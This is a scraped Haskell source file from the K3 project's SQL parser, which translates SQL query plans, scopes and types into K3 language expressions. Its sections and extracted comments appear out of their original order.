([(DC.global (i ++ "LoaderE") (immutT $ TC.function pathCT $ TC.function dt TC.unit) Nothing) @+ cArgsProp 2,
DC.global (i ++ "Files") (immutT pathCT) Nothing],
rexpr)
mkPeerInit exprs =
[DC.trigger "startPeer" TC.unit $ EC.lambda "_" $
EC.block $ exprs ++ [EC.send (EC.variable "start") (EC.variable $ if distributed then "master" else "me") EC.unit]]
mkInit decls = do
sendsE <- if distributed then
let startE = EC.block $ flip map stageinits $ \i ->
EC.applyMany (EC.project "iterate" $ EC.variable "peers")
[EC.lambda "p" $ EC.send (EC.variable $ trig i) (EC.project "addr" $ EC.variable "p") EC.unit]
in mkCountBarrier startE $ EC.applyMany (EC.project "size" $ EC.variable "peers") [EC.unit]
else return $ EC.block $ map (\i -> EC.send (EC.variable i) (EC.variable "me") EC.unit) $ foldl declTriggers [] decls
return $ [DC.trigger "start" TC.unit $ EC.lambda "_" $
EC.block $ [EC.unit @+ EApplyGen True "SQL" Map.empty, sendsE]]
declTriggers acc (tag -> DTrigger i _ _) = acc ++ [i]
declTriggers acc _ = acc
sqlstringify :: [SQLDecl] -> SQLParseM [String]
sqlstringify stmts = mapM prettystmt stmts
where prettystmt (SQLRel (i, t)) = return $ boxToString $ [unwords ["Table:", i]] %$ prettyLines t
prettystmt (SQLStage (i, t)) = return $ boxToString $ [unwords ["Stage:", i]] %$ prettyLines t
prettystmt (SQLQuery plan) = return $ boxToString $ ["Plan: "] %$ prettyLines plan
sqldepgraph :: [SQLDecl] -> SQLParseM [String]
sqldepgraph stmts = mapM depgraph stmts >>= return . concat
where depgraph (SQLRel _) = return []
depgraph (SQLStage _) = return []
depgraph (SQLQuery (QueryPlan Nothing [] _)) = return []
depgraph (SQLQuery (QueryPlan Nothing chains _)) = chaseScope $ pcoutsid $ last chains
depgraph (SQLQuery (QueryPlan (Just t) chains _)) = treeSchema t >>= \sid -> chaseScope $ chainSchema sid chains
chaseScope sid = do
sf <- sqclkupM sid
ptrs <- sqcfptrsM sid
nodes <- mapM (adgchaseNodesM []) ptrs >>= return . nub . concat
return $ [unwords ["Scope", show sid, show sf, show ptrs]] ++ (indent 2 $ adgnodes nodes)
adgnodes nodes = map (\(p,node) -> unwords [show p, show $ adnn node, show $ adnr node, show $ adnch node])
$ sortBy (compare `on` fst) nodes
{- Code generation helpers. -}
projectPathE :: K3 Expression -> [Identifier] -> K3 Expression
projectPathE e p = foldl (\accE i -> EC.project i accE) e p
fieldE :: TypeMapping -> Identifier -> K3 Expression -> K3 Expression
fieldE Nothing _ e = e
fieldE (Just (Left pfx)) i e = EC.project i $ EC.project pfx e
fieldE (Just (Right tp)) _ e = projectPathE e tp
namedRecordE :: Identifier -> Map Identifier TypePath -> [Identifier] -> SQLParseM (K3 Expression)
namedRecordE i fb ids = foldM field [] ids >>= return . recE
where field acc j = maybe (err j) (\tp -> return $ acc ++ [(j, projectPathE (EC.variable i) tp)]) $ Map.lookup j fb
err j = throwE $ "No field binding found in namedRecordE for " ++ show j
compositeRecordE :: Map Identifier (Identifier, TypeMapping) -> [Identifier] -> SQLParseM (K3 Expression)
compositeRecordE pb ids = foldM field [] ids >>= return . recE
where field acc i = maybe (err i) (\(v, tm) -> return $ acc ++ [(i, fieldE tm i $ EC.variable v)]) $ Map.lookup i pb
err i = throwE $ "No field binding found in compositeRecordE for " ++ show i
bindE :: ScopeId -> BindingMap -> Maybe Identifier -> K3 Expression -> SQLParseM (K3 Expression)
bindE sid bm iOpt e = do
ids <- sqclkupM sid >>= unqualifiedAttrs
case (iOpt, bm) of
(Just i, BMNone) -> return $ EC.bindAs (EC.variable i) (BRecord $ zip ids ids) e
(Just i, BMTPrefix j) -> return $ EC.bindAs (EC.project j $ EC.variable i) (BRecord $ zip ids ids) e
(Just i, BMTFieldMap fb) -> do
initE <- namedRecordE i fb ids
return $ EC.bindAs initE (BRecord $ zip ids ids) e
(_, BMTVPartition pb) -> do
initE <- compositeRecordE pb ids
return $ EC.bindAs initE (BRecord $ zip ids ids) e
_ -> throwE "Invalid binding variable in bindE"
concatE :: ScopeId -> BindingMap -> Maybe Identifier -> SQLParseM (K3 Expression)
concatE sid bm iOpt = do
ids <- sqclkupM sid >>= unqualifiedAttrs
case (iOpt, bm) of
(Just i, BMNone) -> return $ EC.variable i
(Just i, BMTPrefix j) -> return $ EC.project j $ EC.variable i
(Just i, BMTFieldMap fb) -> namedRecordE i fb ids
(_, BMTVPartition pb) -> compositeRecordE pb ids
_ -> throwE "Invalid binding variable in concatE"
aggE :: Identifier -> (Identifier, K3 Expression) -> (Identifier, K3 Expression)
aggE i (f, e) = (f, EC.applyMany e [EC.project f $ EC.variable i])
aggMergeE :: Identifier -> Identifier -> (Identifier, K3 Expression) -> (Identifier, K3 Expression)
aggMergeE i j (f, mergeF) = (f, EC.applyMany mergeF [EC.project f $ EC.variable i, EC.project f $ EC.variable j])
zeroE :: [(Identifier, K3 Type)] -> SQLParseM (K3 Expression)
zeroE [] = return EC.unit
zeroE [(_,t)] = either throwE return $ defaultExpression t
zeroE l = either throwE return $ defaultExpression $ recT l
zeroT :: [(Identifier, K3 Type)] -> SQLParseM (K3 Type)
zeroT [] = return TC.unit
zeroT [(_,t)] = return t
zeroT l = return $ recT l
zeroSQLE :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Expression)
zeroSQLE sidOpt e = scalarexprType sidOpt e >>= \t -> either throwE return $ defaultExpression t
TODO :
memoE :: K3 Expression -> (K3 Expression -> SQLParseM (K3 Expression)) -> SQLParseM (K3 Expression)
memoE srcE bodyF = case tag srcE of
EConstant _ -> bodyF srcE
EVariable _ -> bodyF srcE
_ -> do { be <- bodyF $ EC.variable "__memo";
return $ EC.letIn "__memo" (immutE srcE) $ be }
matchE :: ScopeId -> BindingMap -> K3 Expression -> K3 Expression -> SQLParseM (K3 Expression)
matchE sid bm elemexpr colexpr = do
ids <- sqclkupM sid >>= unqualifiedAttrs
targetE <- matchTargetE ids
memoE (immutE elemexpr) $ \e -> do
bodyE <- bindE sid bm (Just "__x") $ EC.binop OEqu targetE e
return $ EC.applyMany (EC.project "filter" $ colexpr) [EC.lambda "__x" bodyE]
where matchTargetE [x] = return $ EC.variable x
matchTargetE l = throwE $ "Invalid match targets: " ++ show l
memberE :: Bool -> ScopeId -> BindingMap -> K3 Expression -> K3 Expression -> SQLParseM (K3 Expression)
memberE asMem sid bm elemexpr colexpr = matchE sid bm elemexpr colexpr >>= emptyE (not asMem)
emptyE :: Bool -> K3 Expression -> SQLParseM (K3 Expression)
emptyE asEmpty colexpr = return $
EC.binop (if asEmpty then OEqu else ONeq)
(EC.applyMany (EC.project "size" colexpr) [EC.unit]) $ EC.constant $ CInt 0
-- | Property construction helper
cArgsProp :: Int -> Annotation Declaration
cArgsProp i = DProperty $ Left ("CArgs", Just $ LC.int i)
{- Query plan pretty printing. -}
prettyList :: (Pretty a) => [a] -> [String]
prettyList [] = []
prettyList [x] = "|" : (shift "`- " " " $ prettyLines x)
prettyList l = "|" : (concatMap (\x -> shift "+- " "| " $ prettyLines x) (init l)
++ ["|"] ++ (shift "`- " " " $ prettyLines $ last l))
instance Pretty (Tree PlanNode) where
prettyLines (Node (PJoin psid osid jt jeq jp _ chains) ch) =
[unwords ["Join", show psid, show osid, show jt, "equalities", show $ length jeq, "preds", show $ length jp]]
++ prettyList chains ++ drawSubTrees ch
prettyLines (Node (PTable n sid _ _ chains) _) =
[unwords ["Table", n, show sid]] ++ prettyList chains
prettyLines (Node (PSubquery _ qcl) _) = ["Subquery", "|"] ++ (shift "`- " " " $ prettyLines qcl)
instance Pretty QueryClosure where
prettyLines (QueryClosure _ plan) = ["QueryClosure", "|"] ++ (shift "`- " " " $ prettyLines plan)
instance Pretty QueryPlan where
prettyLines (QueryPlan treeOpt chains stgOpt) =
["QueryPlan " ++ maybe "" id stgOpt] ++ (maybe [] treeF treeOpt) ++ prettyList chains
where treeF t = if null chains then "|" : (shift "`- " " " $ prettyLines t)
else "|" : (shift "+- " "| " $ prettyLines t)
instance Pretty PlanCPath where
prettyLines (PlanCPath sid selects gbs prjs aggs having _) =
[unwords ["PlanCPath", show sid
, "sels", show $ length selects
, "gbys", show $ length gbs
, "prjs", show $ length prjs
, "aggs", show $ length aggs
, maybe "<no having>" (const "having") having]]
| null | https://raw.githubusercontent.com/DaMSL/K3/51749157844e76ae79dba619116fc5ad9d685643/src/Language/K3/Parser/SQL.hs | haskell | # LANGUAGE DoAndIfThenElse #
TODO:
x. more groupByPushdown, subquery and distributed plan testing
| Relation names and types.
| Attribute dependency graph.
| Scope frames are mappings of name paths (qualified or unqualified) to attributes.
| Scope environments store bindings throughout a query's subexpressions.
| Internal query plan representation.
| Binding mappings
| Parsing state environment.
| A stateful SQL parsing monad.
| SQL program statements
Naming helpers.
Type and alias helpers.
| Wraps a collection's element type with an 'elem' label
SQLParseM helpers.
SQLEnv helpers
| Relation type accessors
| Dependency graph accessors.
| Scope environment accessors.
| Symbol generation.
| State accessors.
Scope construction
| Extend the attribute graph for a relation type computed from the given expressions.
Relation type and name construction.
TODO: timestamp, interval, size limits for numbers
SQL AST helpers.
Scope accessors.
Binding map helpers.
Query plan accessors.
Path/chain accessors.
TODO:
i. builtin function types
TODO: return subquery type, not bool!
Rewriting helpers.
TODO: case, etc.
This function does not descend into subqueries.
However, it should include free variables present in the subquery, and defined in
the given scope.
| Returns pointers bound in a scope frame.
| Chases a given attribute pointer to the provided roots (or its set of source nodes if
no roots are given).
| Returns a set of nodes visited during a chase on a given list of roots and a starting pointer.
Optimization
TODO: query decorrelation
TODO: distinct, order, limit, offset
TODO: simplify chains with join tree before adding to top-level plan.
TODO: case, correlated subqueries, more type constructors
Case-statement generation.
Subqueries
Code generation helpers.
| Property construction helper
Query plan pretty printing. | # LANGUAGE LambdaCase #
# LANGUAGE PatternSynonyms #
# LANGUAGE TupleSections #
# LANGUAGE ViewPatterns #
3 . chain simplification
5 . expression case completion
6 . pushdown in subqueries
7 . subqueries in gbs , prjs , aggs
8 . correlated subqueries , and query decorrelation
module Language.K3.Parser.SQL where
import Control.Arrow ( (***), (&&&), first, second )
import Control.Monad
import Control.Monad.State
import Control.Monad.Trans.Except
import Data.Function ( on )
import Data.Functor.Identity
import Data.Maybe ( catMaybes )
import Data.Either ( partitionEithers )
import Data.Monoid
import Data.List ( (\\), find, intersect, nub, isInfixOf, isPrefixOf, sortBy, unzip4 )
import Data.Map ( Map )
import Data.Set ( Set )
import Data.Tree
import qualified Data.Map as Map
import qualified Data.Set as Set
import Debug.Trace
import Database.HsSqlPpp.Ast
import Database.HsSqlPpp.Annotation hiding ( Annotation )
import qualified Database.HsSqlPpp.Annotation as HA ( Annotation )
import Database.HsSqlPpp.Parser
import Database.HsSqlPpp.Pretty
import Language.K3.Core.Annotation
import Language.K3.Core.Common
import Language.K3.Core.Declaration
import Language.K3.Core.Expression
import Language.K3.Core.Type
import Language.K3.Core.Literal
import Language.K3.Core.Metaprogram
import Language.K3.Core.Utils
import qualified Language.K3.Core.Constructor.Declaration as DC
import qualified Language.K3.Core.Constructor.Expression as EC
import qualified Language.K3.Core.Constructor.Literal as LC
import qualified Language.K3.Core.Constructor.Type as TC
import Language.K3.Utils.Pretty
import Language.K3.Utils.Pretty.Syntax
data OperatorFn = UnaryOp Operator ScalarExpr
| BinaryOp Operator ScalarExpr ScalarExpr
deriving (Eq, Show)
data AggregateFn = AggSum
| AggCount
| AggMin
| AggMax
deriving (Eq, Read, Show)
type RTypeEnv = Map Identifier (K3 Type)
type ADGPtr = Int
data ADGNode = ADGNode { adnn :: Identifier
, adnt :: K3 Type
, adnr :: Maybe Identifier
, adne :: Maybe ScalarExpr
, adnch :: [ADGPtr] }
deriving (Eq, Show)
type ADGraph = Map ADGPtr ADGNode
type AttrPath = [Identifier]
type Qualifiers = [[Identifier]]
type AttrEnv = Map AttrPath ADGPtr
type ScopeFrame = (AttrEnv, [AttrPath], Qualifiers)
type ScopeId = Int
type ScopeEnv = Map ScopeId ScopeFrame
data QueryClosure = QueryClosure { qcfree :: [AttrPath]
, qcplan :: QueryPlan }
deriving (Eq, Show)
type SubqueryBindings = [(ScalarExpr, (Identifier, QueryClosure))]
data PlanCPath = PlanCPath { pcoutsid :: ScopeId
, pcselects :: ScalarExprList
, pcgroupbys :: ScalarExprList
, pcprojects :: SelectItemList
, pcaggregates :: SelectItemList
, pchaving :: MaybeBoolExpr
, pcbindings :: SubqueryBindings }
deriving (Eq, Show)
data PlanNode = PJoin { pnjprocsid :: ScopeId
, pnjoutsid :: ScopeId
, pnjtype :: Maybe (Natural, JoinType)
, pnjequalities :: [(ScalarExpr, ScalarExpr)]
, pnjpredicates :: ScalarExprList
, pnjpredbinds :: SubqueryBindings
, pnjpath :: [PlanCPath] }
| PSubquery { pnsqoutsid :: ScopeId
, pnqclosure :: QueryClosure }
| PTable { pntid :: Identifier
, pntoutsid :: ScopeId
, pntref :: Maybe TableRef
, pntbindmap :: Maybe BindingMap
, pntpath :: [PlanCPath] }
deriving (Eq, Show)
type PlanTree = Tree PlanNode
data QueryPlan = QueryPlan { qjoinTree :: Maybe PlanTree
, qpath :: [PlanCPath]
, qstageid :: Maybe Identifier }
deriving (Eq, Show)
type TypePrefix = Identifier
type TypePath = [Identifier]
type TypeMapping = Maybe (Either TypePrefix TypePath)
data BindingMap = BMNone
| BMTPrefix Identifier
| BMTFieldMap (Map Identifier TypePath)
| BMTVPartition (Map Identifier (Identifier, TypeMapping))
deriving (Eq, Show)
data SQLEnv = SQLEnv { relations :: RTypeEnv
, adgraph :: ADGraph
, scopeenv :: ScopeEnv
, aliassym :: ParGenSymS
, adpsym :: ParGenSymS
, spsym :: ParGenSymS
, sqsym :: ParGenSymS
, stgsym :: ParGenSymS
, slblsym :: ParGenSymS
, aggdsym :: ParGenSymS }
deriving (Eq, Show)
type SQLParseM = ExceptT String (State SQLEnv)
data SQLDecl = SQLRel (Identifier, K3 Type)
| SQLStage (Identifier, K3 Type)
| SQLQuery QueryPlan
deriving (Eq, Show)
type StageGraph = [Either Identifier (Identifier, Identifier)]
materializeId :: Identifier -> Identifier
materializeId n = "output" ++ n
stageId :: Identifier -> Identifier
stageId n = "stage" ++ n
immutT :: K3 Type -> K3 Type
immutT t = t @<- ((filter (not . isTQualified) $ annotations t) ++ [TImmutable])
mutT :: K3 Type -> K3 Type
mutT t = t @<- ((filter (not . isTQualified) $ annotations t) ++ [TMutable])
immutE :: K3 Expression -> K3 Expression
immutE e = e @<- ((filter (not . isEQualified) $ annotations e) ++ [EImmutable])
mutE :: K3 Expression -> K3 Expression
mutE e = e @<- ((filter (not . isEQualified) $ annotations e) ++ [EMutable])
tupE :: [K3 Expression] -> K3 Expression
tupE [e] = immutE e
tupE el = EC.tuple $ map immutE el
recE :: [(Identifier, K3 Expression)] -> K3 Expression
recE ide = EC.record $ map (\(i,e) -> (i, immutE e)) ide
recT :: [(Identifier, K3 Type)] -> K3 Type
recT idt = TC.record $ map (\(i,t) -> (i, immutT t)) idt
telemM :: K3 Type -> SQLParseM (K3 Type)
telemM (tnc -> (TCollection, [t])) = return t
telemM t = throwE $ boxToString $ ["Invalid relation type"] %$ prettyLines t
tcolM :: K3 Type -> SQLParseM (K3 Type)
tcolM t = return $ (TC.collection t) @<- [TAnnotation "Collection", TImmutable]
taliaselemM :: TableAlias -> K3 Type -> SQLParseM (K3 Type)
taliaselemM alias t@(tnc -> (TRecord ids, ch)) =
case alias of
NoAlias _ -> return t
TableAlias _ _ -> return t
FullAlias _ _ fnc | length fnc == length ids -> return $ recT $ zip (map sqlnmcomponent fnc) ch
FullAlias _ _ _ -> throwE $ "Mismatched alias fields length"
taliaselemM _ t = throwE $ boxToString $ ["Invalid relation element type"] %$ prettyLines t
taliascolM :: TableAlias -> K3 Type -> SQLParseM (K3 Type)
taliascolM alias t@(tnc -> (TCollection, [et@(tag -> TRecord _)])) =
taliaselemM alias et >>= \net -> return $ (TC.collection net) @<- (annotations t)
taliascolM _ t = throwE $ boxToString $ ["Invalid relation type"] %$ prettyLines t
| Wraps a K3 record type with a ' elem ' label
twrapelemM :: K3 Type -> SQLParseM (K3 Type)
twrapelemM t@(tag -> TRecord _) = return $ recT [("elem", t)]
twrapelemM t = throwE $ boxToString $ ["Invalid element type for wrapping:"] %$ prettyLines t
twrapcolelemM :: K3 Type -> SQLParseM (K3 Type)
twrapcolelemM t@(tnc -> (TCollection, [et])) = twrapelemM et >>= \net -> return $ (TC.collection net) @<- annotations t
twrapcolelemM t = throwE $ boxToString $ ["Invalid collection type for wrapping:"] %$ prettyLines t
runSQLParseM :: SQLEnv -> SQLParseM a -> (Either String a, SQLEnv)
runSQLParseM env m = flip runState env $ runExceptT m
runSQLParseEM :: SQLEnv -> SQLParseM a -> Either String (a, SQLEnv)
runSQLParseEM env m = r >>= return . (,e)
where (r,e) = runSQLParseM env m
evalSQLParseM :: SQLEnv -> SQLParseM a -> Either String a
evalSQLParseM env m = fst $ runSQLParseM env m
reasonM :: (String -> String) -> SQLParseM a -> SQLParseM a
reasonM errf = mapExceptT $ \m -> m >>= \case
Left err -> return $ Left $ errf err
Right r -> return $ Right r
errorM :: String -> SQLParseM a
errorM msg = reasonM id $ throwE msg
liftExceptM :: Except String a -> SQLParseM a
liftExceptM = mapExceptT (return . runIdentity)
liftEitherM :: Either String a -> SQLParseM a
liftEitherM = either throwE return
sqlenv0 :: SQLEnv
sqlenv0 = SQLEnv Map.empty Map.empty Map.empty contigsymS contigsymS contigsymS contigsymS contigsymS contigsymS contigsymS
srlkup :: RTypeEnv -> Identifier -> Except String (K3 Type)
srlkup env x = maybe err return $ Map.lookup x env
where err = throwE $ "Unknown relation in sql parser environment: " ++ show x
srext :: RTypeEnv -> Identifier -> K3 Type -> RTypeEnv
srext env x t = Map.insert x t env
srdel :: RTypeEnv -> Identifier -> RTypeEnv
srdel env x = Map.delete x env
sglkup :: ADGraph -> ADGPtr -> Except String ADGNode
sglkup g p = maybe err return $ Map.lookup p g
where err = throwE $ "Unknown attribute node in sql parser environment: " ++ show p
sgext :: ADGraph -> ADGNode -> ParGenSymS -> (ADGPtr, ParGenSymS, ADGraph)
sgext g n sym = (ptr, nsym, Map.insert ptr n g)
where (nsym, ptr) = gensym sym
sflkup :: ScopeFrame -> [Identifier] -> Except String ADGPtr
sflkup (fr,_,_) path = maybe err return $ Map.lookup path fr
where err = throwE $ unwords ["Invalid scope path:", show path, "in", show fr]
sftrylkup :: ScopeFrame -> [Identifier] -> Maybe ADGPtr
sftrylkup (fr,_,_) path = Map.lookup path fr
sfptrs :: ScopeFrame -> Except String [ADGPtr]
sfptrs sf@(fr, ord, _) = mapM (\p -> sflkup sf p) ord
sfpush :: ScopeFrame -> [Identifier] -> ADGPtr -> ScopeFrame
sfpush (fr,ord,q) path ptr = (Map.insert path ptr fr, ord ++ [path], nq)
where nq = if length path > 1 then (if init path `notElem` q then q ++ [init path] else q) else q
sfpop :: ScopeFrame -> [Identifier] -> (Maybe ADGPtr, ScopeFrame)
sfpop (fr,ord,q) path = (npopt, (nfr, filter (== path) ord, newq))
where (npopt, nfr) = Map.updateLookupWithKey (\_ _ -> Nothing) path fr
newquals = filter (not . null) $ map (\p -> if length p > 1 then init p else []) $ Map.keys nfr
newq = filter (`elem` newquals) q
sclkup :: ScopeEnv -> ScopeId -> Except String ScopeFrame
sclkup env p = maybe err return $ Map.lookup p env
where err = throwE $ "Unknown scope: " ++ show p
scpush :: ScopeEnv -> ScopeFrame -> ParGenSymS -> (ScopeId, ParGenSymS, ScopeEnv)
scpush env fr sym = (ptr, nsym, Map.insert ptr fr env)
where (nsym, ptr) = gensym sym
scpop :: ScopeEnv -> (Maybe ScopeFrame, ScopeEnv)
scpop env = if Map.null env then (Nothing, env) else (Just fr, Map.delete sp env)
where (sp, fr) = Map.findMax env
scflkup :: ScopeEnv -> ScopeId -> [Identifier] -> Except String ADGPtr
scflkup env sp path = sclkup env sp >>= \fr -> sflkup fr path
scftrylkup :: ScopeEnv -> ScopeId -> [Identifier] -> Except String (Maybe ADGPtr)
scftrylkup env sp path = sclkup env sp >>= \fr -> return $ sftrylkup fr path
scfptrs :: ScopeEnv -> ScopeId -> Except String [ADGPtr]
scfptrs env sp = sclkup env sp >>= sfptrs
scfpush :: ScopeEnv -> [Identifier] -> ADGPtr -> ParGenSymS -> (ScopeId, ParGenSymS, ScopeEnv)
scfpush env path np sym = if Map.null env then scpush env (Map.singleton path np, [path], pathqual) sym
else (sp, sym, Map.insert sp (sfpush fr path np) env)
where (sp,fr) = Map.findMax env
pathqual = if length path > 1 then [init path] else []
scfpop :: ScopeEnv -> [Identifier] -> (Maybe ADGPtr, ScopeEnv)
scfpop env path = if Map.null env then (Nothing, env) else (npopt, Map.insert sp nfr env)
where (sp, fr) = Map.findMax env
(npopt, nfr) = sfpop fr path
sasext :: SQLEnv -> (Int, SQLEnv)
sasext senv = (n, senv {aliassym = nsym})
where (nsym, n) = gensym (aliassym senv)
stgsext :: SQLEnv -> (Int, SQLEnv)
stgsext senv = (n, senv {stgsym = nsym})
where (nsym, n) = gensym (stgsym senv)
ssqsext :: SQLEnv -> (Int, SQLEnv)
ssqsext senv = (n, senv {sqsym = nsym})
where (nsym, n) = gensym (sqsym senv)
slblsext :: SQLEnv -> (Int, SQLEnv)
slblsext senv = (n, senv {slblsym = nsym})
where (nsym, n) = gensym (slblsym senv)
saggsext :: SQLEnv -> (Int, SQLEnv)
saggsext senv = (n, senv {aggdsym = nsym})
where (nsym, n) = gensym (aggdsym senv)
sqrlkup :: SQLEnv -> Identifier -> Except String (K3 Type)
sqrlkup senv n = srlkup (relations senv) n
sqrext :: SQLEnv -> Identifier -> K3 Type -> SQLEnv
sqrext senv n t = senv { relations = srext (relations senv) n t }
sqrdel :: SQLEnv -> Identifier -> SQLEnv
sqrdel senv n = senv { relations = srdel (relations senv) n }
sqglkup :: SQLEnv -> ADGPtr -> Except String ADGNode
sqglkup senv p = sglkup (adgraph senv) p
sqgext :: SQLEnv -> ADGNode -> (ADGPtr, SQLEnv)
sqgext senv n = (ptr, senv {adgraph = ng, adpsym = nsym})
where (ptr, nsym, ng) = sgext (adgraph senv) n (adpsym senv)
sqclkup :: SQLEnv -> ScopeId -> Except String ScopeFrame
sqclkup env p = sclkup (scopeenv env) p
sqcpush :: SQLEnv -> ScopeFrame -> (ScopeId, SQLEnv)
sqcpush env fr = (nsp, env {scopeenv = nenv, spsym = nsym})
where (nsp, nsym, nenv) = scpush (scopeenv env) fr (spsym env)
sqcpop :: SQLEnv -> (Maybe ScopeFrame, SQLEnv)
sqcpop env = (fropt, env { scopeenv = nsenv })
where (fropt, nsenv) = scpop (scopeenv env)
sqcflkup :: SQLEnv -> ScopeId -> [Identifier] -> Except String ADGPtr
sqcflkup env sp path = scflkup (scopeenv env) sp path
sqcftrylkup :: SQLEnv -> ScopeId -> [Identifier] -> Except String (Maybe ADGPtr)
sqcftrylkup env sp path = scftrylkup (scopeenv env) sp path
sqcfptrs :: SQLEnv -> ScopeId -> Except String [ADGPtr]
sqcfptrs env sp = scfptrs (scopeenv env) sp
sqcfpush :: SQLEnv -> [Identifier] -> ADGPtr -> (ScopeId, SQLEnv)
sqcfpush env path np = (nsp, env {scopeenv = nsenv, spsym = nsym})
where (nsp, nsym, nsenv) = scfpush (scopeenv env) path np (spsym env)
sqcfpop :: SQLEnv -> [Identifier] -> (Maybe ADGPtr, SQLEnv)
sqcfpop env path = (npopt, env {scopeenv = nsenv})
where (npopt, nsenv) = scfpop (scopeenv env) path
| Monadic accessors .
sqrlkupM :: Identifier -> SQLParseM (K3 Type)
sqrlkupM n = get >>= liftExceptM . (\env -> sqrlkup env n)
sqrextM :: Identifier -> K3 Type -> SQLParseM ()
sqrextM n t = get >>= \env -> return (sqrext env n t) >>= put
sqglkupM :: ADGPtr -> SQLParseM ADGNode
sqglkupM p = get >>= liftExceptM . (\env -> sqglkup env p)
sqgextM :: ADGNode -> SQLParseM ADGPtr
sqgextM n = get >>= \env -> return (sqgext env n) >>= \(r, nenv) -> put nenv >> return r
sqclkupM :: ScopeId -> SQLParseM ScopeFrame
sqclkupM sp = get >>= liftExceptM . (\env -> sqclkup env sp)
sqcpushM :: ScopeFrame -> SQLParseM ScopeId
sqcpushM fr = get >>= \env -> return (sqcpush env fr) >>= \(r, nenv) -> put nenv >> return r
sqcpopM :: SQLParseM (Maybe ScopeFrame)
sqcpopM = get >>= \env -> return (sqcpop env) >>= \(r, nenv) -> put nenv >> return r
sqcflkupM :: ScopeId -> [Identifier] -> SQLParseM ADGPtr
sqcflkupM sp path = get >>= liftExceptM . (\env -> sqcflkup env sp path)
sqcftrylkupM :: ScopeId -> [Identifier] -> SQLParseM (Maybe ADGPtr)
sqcftrylkupM sp path = get >>= liftExceptM . (\env -> sqcftrylkup env sp path)
sqcfptrsM :: ScopeId -> SQLParseM [ADGPtr]
sqcfptrsM sp = get >>= liftExceptM . (\env -> sqcfptrs env sp)
sqcfpushM :: [Identifier] -> ADGPtr -> SQLParseM ScopeId
sqcfpushM path np = get >>= \env -> return (sqcfpush env path np) >>= \(r, nenv) -> put nenv >> return r
sqcfpopM :: [Identifier] -> SQLParseM (Maybe ADGPtr)
sqcfpopM path = get >>= \env -> return (sqcfpop env path) >>= \(r, nenv) -> put nenv >> return r
sasextM :: SQLParseM Int
sasextM = get >>= \env -> return (sasext env) >>= \(i, nenv) -> put nenv >> return i
stgsextM :: SQLParseM Int
stgsextM = get >>= \env -> return (stgsext env) >>= \(i, nenv) -> put nenv >> return i
ssqsextM :: SQLParseM Int
ssqsextM = get >>= \env -> return (ssqsext env) >>= \(i, nenv) -> put nenv >> return i
slblsextM :: SQLParseM Int
slblsextM = get >>= \env -> return (slblsext env) >>= \(i, nenv) -> put nenv >> return i
saggsextM :: SQLParseM Int
saggsextM = get >>= \env -> return (saggsext env) >>= \(i, nenv) -> put nenv >> return i
sqgextScopeM :: Identifier -> [Identifier] -> [ADGPtr] -> SQLParseM ScopeId
sqgextScopeM qualifier ids ptrs = do
let paths = map (:[]) ids
let qpaths = map (\i -> [qualifier,i]) ids
sqcpushM (Map.fromList $ zip paths ptrs ++ zip qpaths ptrs, paths, [[qualifier]])
sqgextSchemaM :: Maybe Identifier -> K3 Type -> SQLParseM ScopeId
sqgextSchemaM (Just n) t = do
rt <- telemM t
case tnc rt of
(TRecord ids, ch) -> do
ptrs <- mapM sqgextM $ map (\(i, ct) -> ADGNode i ct (Just n) Nothing []) $ zip ids ch
sqgextScopeM n ids ptrs
_ -> throwE $ boxToString $ ["Invalid relational element type"] %$ prettyLines rt
sqgextSchemaM _ _ = throwE "No relation name specified when extending attribute graph"
sqgextAliasM :: Maybe Identifier -> K3 Type -> [ADGPtr] -> SQLParseM ScopeId
sqgextAliasM (Just n) t srcptrs = do
rt <- telemM t
case tag rt of
TRecord dstids | length dstids == length srcptrs -> do
destnodes <- mapM mknode $ zip dstids srcptrs
destptrs <- mapM sqgextM destnodes
sqgextScopeM n dstids destptrs
_ -> throwE $ boxToString $ ["Invalid alias type when extending attribute graph"] %$ prettyLines rt
where mknode (d, ptr) = do
node <- sqglkupM ptr
return $ ADGNode d (adnt node) (Just n) (Just $ Identifier emptyAnnotation $ Nmc $ adnn node) [ptr]
sqgextAliasM _ _ _ = throwE "Invalid alias arguments when extending attribute graph"
sqgextExprM :: ScopeId -> Maybe Identifier -> [(Identifier, K3 Type, ScalarExpr)] -> SQLParseM ScopeId
sqgextExprM sid (Just n) exprs = do
nodes <- mapM mknode exprs
ptrs <- mapM sqgextM nodes
sqgextScopeM n (map (\(i,_,_) -> i) exprs) ptrs
where mknode (i, t, e) = do
eptrs <- exprAttrs sid e
return $ ADGNode i t (Just n) (Just e) eptrs
sqgextExprM _ _ _ = throwE "Invalid expr arguments when extending attribute graph"
sqltabletype :: AttributeDefList -> SQLParseM (K3 Type)
sqltabletype attrs = sqlrectype attrs >>= tcolM
sqlrectype :: AttributeDefList -> SQLParseM (K3 Type)
sqlrectype attrs = mapM sqlattr attrs >>= \ts -> return (recT ts)
sqlattr :: AttributeDef -> SQLParseM (Identifier, K3 Type)
sqlattr (AttributeDef _ nm t _ _) = sqlnamedtype t >>= return . (sqlnmcomponent nm,)
sqltype :: String -> Maybe Int -> Maybe Int -> SQLParseM (K3 Type)
sqltype s lpOpt uOpt = case s of
"int" -> return TC.int
"integer" -> return TC.int
"real" -> return TC.real
"double precision" -> return TC.real
"text" -> return TC.string
"varchar" -> return $ maybe TC.string (\i -> TC.string @+ TProperty (Left $ "TPCHVarchar_" ++ show i)) lpOpt
"date" -> return $ TC.int @+ TProperty (Left "TPCHDate")
_ -> throwE $ "Invalid K3-SQL type: " ++ s
sqlnamedtype :: TypeName -> SQLParseM (K3 Type)
sqlnamedtype tn = case tn of
ArrayTypeName _ ctn -> sqlnamedtype ctn >>= \t -> return $ (TC.collection t) @+ TAnnotation "Vector"
Prec2TypeName _ s l u -> sqltype s (Just $ fromInteger l) (Just $ fromInteger u)
PrecTypeName _ s p -> sqltype s (Just $ fromInteger p) Nothing
SetOfTypeName _ ctn -> sqlnamedtype ctn >>= \t -> return $ (TC.collection t) @+ TAnnotation "Set"
SimpleTypeName _ s -> sqltype s Nothing Nothing
sqlnm :: Name -> String
sqlnm (Name _ comps) = concatMap sqlnmcomponent comps
sqlnmcomponent :: NameComponent -> String
sqlnmcomponent (Nmc s) = s
sqlnmcomponent (QNmc s) = s
sqlnmpath :: [NameComponent] -> [String]
sqlnmpath nmcl = map sqlnmcomponent nmcl
sqltablealias :: Identifier -> TableAlias -> Maybe Identifier
sqltablealias def alias = case alias of
NoAlias _ -> Just def
TableAlias _ nc -> Just $ "__" ++ sqlnmcomponent nc
